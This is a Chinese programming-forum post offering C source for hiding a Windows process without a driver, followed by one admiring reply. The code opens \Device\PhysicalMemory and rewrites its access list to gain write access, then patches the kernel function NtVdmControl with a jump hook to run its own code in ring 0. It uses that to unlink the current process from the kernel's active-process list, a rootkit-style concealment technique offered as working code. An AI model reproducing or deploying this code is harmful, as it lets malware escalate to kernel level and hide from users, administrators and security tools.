设为首页收藏本站
开启辅助访问 切换到宽版

看流星社区

 找回密码
 注册账号
看流星社区»看流星社区 » 【编程技术】 C/C++技术分享 VC无驱动隐藏进程源码
返回列表 发新帖
查看: 2974|回复: 1

VC无驱动隐藏进程源码

[复制链接]
chc2203

该用户从未签到
发表于 2012-2-22 14:33:46 | 显示全部楼层 |阅读模式
  1. #include <Windows.h>
  2. #include <winioctl.h>
  3. #include <winsvc.h>
  4. #include <stdlib.h>
  5. #include <stdio.h>
  6. #include <Aclapi.h>
  7. #include <Ntsecapi.h>
  8. #pragma comment (lib,"ntdll.lib")
  9. #pragma comment (lib,"Kernel32.lib")
  10. #pragma comment (lib,"Advapi32.lib")
  11. #define STATUS_INFO_LENGTH_MISMATCH 0xC0000004
  12. #define OBJ_KERNEL_HANDLE 0x00000200
  13. #define STATUS_NOT_IMPLEMENTED 0xC0000002
  14. #define STATUS_ACCESS_DENIED 0xC0000022
  15. //typedef unsigned long DWORD;
  16. #define STATUS_SUCCESS 0X00000000
  17. #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
  18. #define InitializeObjectAttributes(p,n,a,r,s){\
  19. (p)->Length=sizeof(OBJECT_ATTRIBUTES);\
  20. (p)->RootDirectory=r;\
  21. (p)->Attributes=a;\
  22. (p)->ObjectName=n;\
  23. (p)->SecurityDescriptor=s;\
  24. (p)->SecurityQualityOfService=NULL;\
  25. }
  26. NTSYSAPI NTSTATUS NTAPI ZwUnmapViewOfSection(IN HANDLE ProcessHandle,IN PVOID BaseAddress);
  27. NTSYSAPI NTSTATUS NTAPI ZwClose(IN HANDLE Handle);
  28. NTSYSAPI VOID NTAPI RtlInitUnicodeString(PUNICODE_STRING DestinationString,PCWSTR SourceString);
  29. NTSYSAPI NTSTATUS NTAPI NtVdmControl(IN ULONG ControlCode,IN PVOID ControlData);
  30. typedef enum _SECTION_INHERIT
  31. {
  32. ViewShare=1,
  33. ViewUnmap=2
  34. }SECTION_INHERIT;
  35. typedef struct _OBJECT_ATTRIBUTES {
  36. ULONG Length;
  37. HANDLE RootDirectory;
  38. PUNICODE_STRING ObjectName;
  39. ULONG Attributes;
  40. PVOID SecurityDescriptor;
  41. PVOID SecurityQualityOfService;
  42. } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;

  44. typedef struct _SYSTEM_MODULE_INFORMATION
  45. {
  46. ULONG Reserved[2];
  47. PVOID Base;
  48. ULONG Size;
  49. ULONG Flags;
  50. USHORT Index;
  51. USHORT Unknown;
  52. USHORT LoadCount;
  53. USHORT ModuleNameOffset;
  54. CHAR ImageName[256];
  55. }SYSTEM_MODULE_INFORMATION,*PSYSTEM_MODULE_INFORMATION;
  56. NTSYSAPI
  57. NTSTATUS
  58. NTAPI
  59. ZwOpenSection(\
  60. OUT PHANDLE SectionHandle,\
  61. IN ACCESS_MASK DesiredAccess,\
  62. IN POBJECT_ATTRIBUTES ObjectAttributes\
  63. );
  64. BOOLEAN
  65. (NTAPI *pfnPsGetVersion)(
  66. PULONG MajorVersion OPTIONAL,
  67. PULONG MinorVersion OPTIONAL,
  68. PULONG BuildNumber OPTIONAL,
  69. PUNICODE_STRING CSDVersion OPTIONAL
  70. );
  71. HANDLE
  72. (NTAPI *pfnPsGetCurrentProcessId)(
  73. );
  74. HANDLE
  75. (NTAPI *pfnPsGetCurrentProcess)();
  76. NTSYSAPI
  77. NTSTATUS
  78. NTAPI
  79. ZwMapViewOfSection(
  80. IN HANDLE SectionHandle,
  81. IN HANDLE ProcessHandle,
  82. IN OUT PVOID *BaseAddress,
  83. IN ULONG ZeroBits,
  84. IN ULONG CommitSize,
  85. IN OUT PLARGE_INTEGER SectionOffset OPTIONAL,
  86. IN OUT PULONG ViewSize,
  87. IN SECTION_INHERIT InheritDisposition,
  88. IN ULONG AllocationType,
  89. IN ULONG Protect
  90. );


  93. NTSYSAPI
  94. NTSTATUS
  95. NTAPI
  96. ZwQuerySystemInformation(
  97. ULONG SystemInformationClass,
  98. PVOID SystemInformation,
  99. ULONG SystemInformationLength,
  100. PULONG ReturnLength
  101. );
  102. PVOID
  103. (NTAPI *pfnMemcpy)(
  104. IN VOID UNALIGNED *Destination,
  105. IN CONST VOID UNALIGNED *Source,
  106. IN SIZE_T Length
  107. );
  108. NTSTATUS
  109. (NTAPI *pfnNtVdmControl)(
  110. IN ULONG ControlCode,
  111. IN PVOID ControlData
  112. );
  113. ULONG
  114. (_cdecl *pfnDbgPrint)(
  115. IN PCHAR Format,
  116. ...
  117. );
  118. /*typedef struct _OBJECT_ATTRIBUTES
  119. {
  120. ULONG Length;
  121. HANDLE RootDirectory;
  122. PUNICODE_STRING ObjectName;
  123. ULONG Attributes;
  124. PVOID SecurityDescriptor;
  125. PVOID SecurityQualityOfService;
  126. } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;
  127. */
  128. NTSTATUS Ring0Code(ULONG size,PULONG buffer)
  129. {
  130. DWORD eproc=0x00000000;
  131. ULONG BuildNumber;
  132. DWORD PIDOffset,ListOffset;
  133. int start_PID=0;
  134. PLIST_ENTRY plist_active_procs;
  135. PIDOffset=0x84;
  136. ListOffset=0x88;


  139. // LIST_ENTRY plist_active_procs;
  140. // PLIST_ENTRY plist_active_procs;//=NULL;
  141. eproc=(DWORD)pfnPsGetCurrentProcess();
  142. plist_active_procs=(LIST_ENTRY*)(eproc+ListOffset);
  143. *((DWORD*)plist_active_procs->Blink)=(DWORD)plist_active_procs->Flink;
  144. *((DWORD*)plist_active_procs->Flink+1)=(DWORD)plist_active_procs->Blink;
  145. //start_PID=*((DWORD*)(eproc+PIDOffset));
  146. //current_PID=start_PID;


  149. // pfnPsGetVersion(NULL,NULL,&BuildNumber,NULL);
  150. //PLIST_ENTRY ListHead,ListPtr;
  151. /* switch (BuildNumber) // 各版本OS的KPEB结构不同
  152. {
  153. case 2195: // Win2000
  154. // ListOffset = 0xa0;
  155. PIDOffset = 0x9c;
  156. // NameOffset = 0x1fc;
  157. break;
  158. case 2600: // WinXP
  159. // ListOffset = 0x88;
  160. PIDOffset = 0x84;
  161. // NameOffset = 0x174;
  162. break;
  163. case 3790: // Win2003
  164. // ListOffset = 0x88;
  165. PIDOffset = 0x84;
  166. // NameOffset = 0x154;
  167. break;
  168. default:
  169. return STATUS_NOT_IMPLEMENTED;
  170. }*/

  172. pfnDbgPrint("PIDOffset is %d\n",PIDOffset);
  173. //pfnDbgPrint("Enter Ring0\nmyprocess is %d\n",eproc);
  174. //pfnDbgPrint("Enter Ring0\BuildNumber is %d\n",BuildNumber);
  175. // ListOffset=0x88;
  176. return STATUS_SUCCESS;
  177. }
  178. /*
  179. HANDLE OpenPhysicalMemory()
  180. {
  181. DWORD dwRet;
  182. NTSTATUS status;
  183. UNICODE_STRING name;
  184. OBJECT_ATTRIBUTES oa;
  185. EXPLICIT_ACCESS ea;
  186. PSECURITY_DESCRIPTOR pSD;

  188. PACL pDacl=NULL;
  189. PACL pNewDacl=NULL;
  190. HANDLE hSection=NULL;
  191. HANDLE hSectionRet=NULL;
  192. RtlInitUnicodeString(&name,L"\\Device\\PhysicalMemory");
  193. InitializeObjectAttributes(&oa,&name,OBJ_KERNEL_HANDLE,NULL,NULL);

  195. status=ZwOpenSection(&hSectionRet,SECTION_MAP_READ|SECTION_MAP_WRITE,&oa);
  196. if(NT_SUCCESS(status))
  197. {
  198. printf("错误\n");
  199. return NULL;
  200. }

  202. dwRet=0;

  204. return NULL;
  205. }*/

  207. PVOID MapPhysicalMemory(HANDLE hSection, // 物理内存的Section句柄
  208. ULONG Offset, // 映射起始偏移量,相对于物理内存的0地址
  209. ULONG CommitSize // 映射范围
  210. )
  211. {
  212. NTSTATUS status;
  213. PVOID BaseAddress = NULL;
  214. LARGE_INTEGER PhysicalAddress = {Offset, 0};
  215. SIZE_T ViewSize = CommitSize;

  217. status = ZwMapViewOfSection(hSection, (HANDLE)-1, &BaseAddress, 0,
  218. CommitSize, &PhysicalAddress, &ViewSize, ViewShare, 0, PAGE_READWRITE);
  219. if (!NT_SUCCESS(status))
  220. {
  221. printf("ZwMapViewOfSection Failed: %d\n", LsaNtStatusToWinError(status));
  222. return NULL;
  223. }

  225. return BaseAddress;
  226. }
  227. HANDLE OpenPhysicalMemory()
  228. {
  229. DWORD dwRet;
  230. NTSTATUS status;
  231. UNICODE_STRING name;
  232. OBJECT_ATTRIBUTES oa;
  233. EXPLICIT_ACCESS ea;
  234. PSECURITY_DESCRIPTOR pSD;
  235. PACL pDacl = NULL;
  236. PACL pNewDacl = NULL;
  237. HANDLE hSection = NULL;
  238. HANDLE hSectionRet = NULL;

  240. RtlInitUnicodeString(&name, L"\\Device\\PhysicalMemory");
  241. InitializeObjectAttributes(&oa, &name, OBJ_KERNEL_HANDLE, NULL, NULL);

  243. // 以可读写Section权限打开PhysicalMemory
  244. status = ZwOpenSection(&hSectionRet, SECTION_MAP_READ | SECTION_MAP_WRITE, &oa);

  246. if (NT_SUCCESS(status)) goto FreeAndExit; // 打开成功,直接返回

  248. if (status != STATUS_ACCESS_DENIED)
  249. {
  250. // 错误,但非权限不足,打开失败
  251. printf("ZwOpenSection[0] Failed: %d\n", LsaNtStatusToWinError(status));
  252. hSectionRet = NULL;
  253. goto FreeAndExit;
  254. }

  256. // 以可读写ACL权限打开PhysicalMemory
  257. status = ZwOpenSection(&hSection, READ_CONTROL | WRITE_DAC, &oa);
  258. if (!NT_SUCCESS(status))
  259. {
  260. printf("ZwOpenSection[1] Failed: %d\n", LsaNtStatusToWinError(status));
  261. goto FreeAndExit;
  262. }

  264. // 获取PhysicalMemory的DACL
  265. dwRet = GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION,
  266. NULL, NULL, &pDacl, NULL, &pSD);
  267. if (dwRet != ERROR_SUCCESS)
  268. {
  269. printf("GetSecurityInfo Failed: %d\n", dwRet);
  270. goto FreeAndExit;
  271. }

  273. // 创建一个ACE,允许当前用户读写PhysicalMemory
  274. ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
  275. ea.grfAccessPermissions = SECTION_MAP_READ | SECTION_MAP_WRITE;
  276. ea.grfAccessMode = GRANT_ACCESS;
  277. ea.grfInheritance = NO_INHERITANCE;
  278. ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;
  279. ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
  280. ea.Trustee.ptstrName = "CURRENT_USER";

  282. // 将新的ACE加入DACL
  283. dwRet = SetEntriesInAcl(1, &ea, pDacl, &pNewDacl);
  284. if (dwRet != ERROR_SUCCESS)
  285. {
  286. printf("SetEntriesInAcl Failed: %d\n", dwRet);
  287. goto FreeAndExit;
  288. }

  290. // 更新PhysicalMemory的DACL
  291. dwRet = SetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION,
  292. NULL, NULL, pNewDacl, NULL);
  293. if (dwRet != ERROR_SUCCESS)
  294. {
  295. printf("SetSecurityInfo Failed: %d\n", dwRet);
  296. goto FreeAndExit;
  297. }

  299. // 再次以可读写权限打开PhysicalMemory
  300. status = ZwOpenSection(&hSectionRet, SECTION_MAP_READ | SECTION_MAP_WRITE, &oa);
  301. if (!NT_SUCCESS(status))
  302. {
  303. printf("ZwOpenSection[2] Failed: %d\n", LsaNtStatusToWinError(status));
  304. goto FreeAndExit;
  305. }

  307. FreeAndExit:
  308. if (pSD) LocalFree(pSD);
  309. if (pNewDacl) LocalFree(pNewDacl);
  310. if (hSection) ZwClose(hSection);
  311. return hSectionRet;
  312. }



  316. int main()
  317. {
  318. char OrigCode[12],HookCode[12]="\xE9\xDD\xDD\xDD\xDD\xB8\x01\x00\x00\xC0\xC3";
  319. NTSTATUS status;
  320. PVOID buffer=NULL;
  321. char Kernel[100],*mapping=NULL;
  322. HMODULE hKernel=NULL;
  323. HANDLE hSection=NULL;
  324. PVOID pBuffer,pModule,pKernel;
  325. PSYSTEM_MODULE_INFORMATION pmi;
  326. ULONG offset;
  327. int n,i;
  328. ULONG nRetSize;
  329. pBuffer=LocalAlloc(LPTR,0x1000);
  330. if(pBuffer==NULL)
  331. {
  332. printf("LocalAlloc failed\n");
  333. return 0;
  334. }
  335. status=ZwQuerySystemInformation(11,pBuffer,0x1000,&nRetSize);
  336. if (STATUS_INFO_LENGTH_MISMATCH == status)
  337. {
  338. LocalFree(pBuffer);
  339. pBuffer = LocalAlloc(LPTR, nRetSize);
  340. if (NULL == pBuffer)
  341. {
  342. printf("LocalAlloc[1] Failed: %d\n", GetLastError());
  343. return 0;
  344. }
  345. status = ZwQuerySystemInformation(11, pBuffer, nRetSize, &nRetSize);
  346. }
  347. pmi=(PSYSTEM_MODULE_INFORMATION)((ULONG)pBuffer+4);
  348. n=*(ULONG*)pBuffer;
  349. pModule=NULL;
  350. printf("n=%d\n");
  351. printf("Base= %0x\n",pmi->Base);
  352. pKernel=pmi->Base;
  353. if((ULONG)pmi->Base<0x80000000||(ULONG)pmi->Base>0x9fffffff)
  354. {
  355. printf("模块基址超出直接内存映射范围\n");
  356. return 0;
  357. }
  358. // for(i=0;i<n;i++)
  359. {
  360. // printf("%s\n",pmi->ImageName+pmi->ModuleNameOffset);
  361. // pmi++;
  362. }
  363. //strcpy(Kernel,(PCSTR)(pmi->ImageName+pmi->ModuleNameOffset));
  364. hKernel=LoadLibrary((PCSTR)(pmi->ImageName+pmi->ModuleNameOffset));
  365. // hKernel=LoadLibrary("ntkrnlpa.exe");
  366. if(NULL==hKernel)
  367. {
  368. printf("LoadLibrary Failed\n");
  369. return 0;
  370. }

  372. //hSection=OpenPhysicalMemory();
  373. if((pfnMemcpy=(PVOID)GetProcAddress(hKernel,"memcpy"))&&(pfnNtVdmControl=(PVOID)GetProcAddress(hKernel,"NtVdmControl"))&&(pfnDbgPrint=(PVOID)GetProcAddress(hKernel,"DbgPrint"))&&(pfnPsGetCurrentProcessId=(PVOID)GetProcAddress(hKernel,"PsGetCurrentProcessId"))&&(pfnPsGetVersion=(PVOID)GetProcAddress(hKernel,"PsGetVersion"))&&(pfnPsGetCurrentProcess=(PVOID)GetProcAddress(hKernel,"PsGetCurrentProcess")));
  374. else
  375. {
  376. printf("GetProcAddress failed\n");
  377. return 0;
  378. }
  379. offset=(ULONG)pKernel-(ULONG)hKernel;
  380. (ULONG)pfnMemcpy+=offset;
  381. (ULONG)pfnNtVdmControl+=offset;
  382. (ULONG)pfnDbgPrint+=offset;
  383. *(ULONG*)(HookCode+1)=(ULONG)Ring0Code-(ULONG)pfnNtVdmControl-5;
  384. hSection=OpenPhysicalMemory();
  385. if(hSection==NULL)
  386. {
  387. printf("set section failed\n");
  388. goto FreeAndExit;
  389. }

  391. offset=(ULONG)pfnNtVdmControl & 0x1FFFF000;

  393. mapping=MapPhysicalMemory(hSection,offset,0x2000);
  394. if(mapping==NULL)
  395. {
  396. printf("mapping failed\n");
  397. goto FreeAndExit;
  398. }

  400. offset=(ULONG)pfnNtVdmControl & 0x00000FFF;
  401. memcpy(OrigCode,mapping+offset,12);

  403. buffer=LocalAlloc(LPTR,0x4000);
  404. if(buffer==NULL)
  405. {
  406. printf("buffer failed\n");
  407. goto FreeAndExit;
  408. }

  410. memcpy(mapping+offset,HookCode,12);
  411. status=NtVdmControl(0x4000,buffer);
  412. memcpy(mapping+offset,OrigCode,12);

  414. if(!NT_SUCCESS(status))
  415. {
  416. printf("NtVdmControl failed\n");
  417. goto FreeAndExit;
  418. }
  419. // printf("pKernel=%0x hKernel=%0x offset=%0x pfnMemcpy=%0x pfnNtVdmControl=%0x\n",pKernel,hKernel,offset,pfnMemcpy,pfnNtVdmControl);


  422. FreeAndExit:
  423. if(buffer!=NULL)LocalFree(buffer);
  424. if(mapping!=NULL) ZwUnmapViewOfSection(hSection,mapping);
  425. if(hSection!=NULL) ZwClose(hSection);
  426. if(hKernel!=NULL) FreeLibrary(hKernel);
  427. while(1);

  429. return 0;
  430. }
复制代码
回复

举报

wdwlbsm

该用户从未签到
发表于 2012-3-25 23:04:46 | 显示全部楼层
高手真多呀
回复 支持 反对

举报

返回列表 发新帖
点击按钮快速添加回复内容: 支持 高兴 激动 给力 加油 苦寻 生气 回帖 路过 感恩
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册账号

本版积分规则

小黑屋|手机版|Archiver|看流星社区 |网站地图

GMT+8, 2024-4-27 18:51

Powered by Kanliuxing X3.4

© 2010-2019 kanliuxing.com

快速回复 返回顶部 返回列表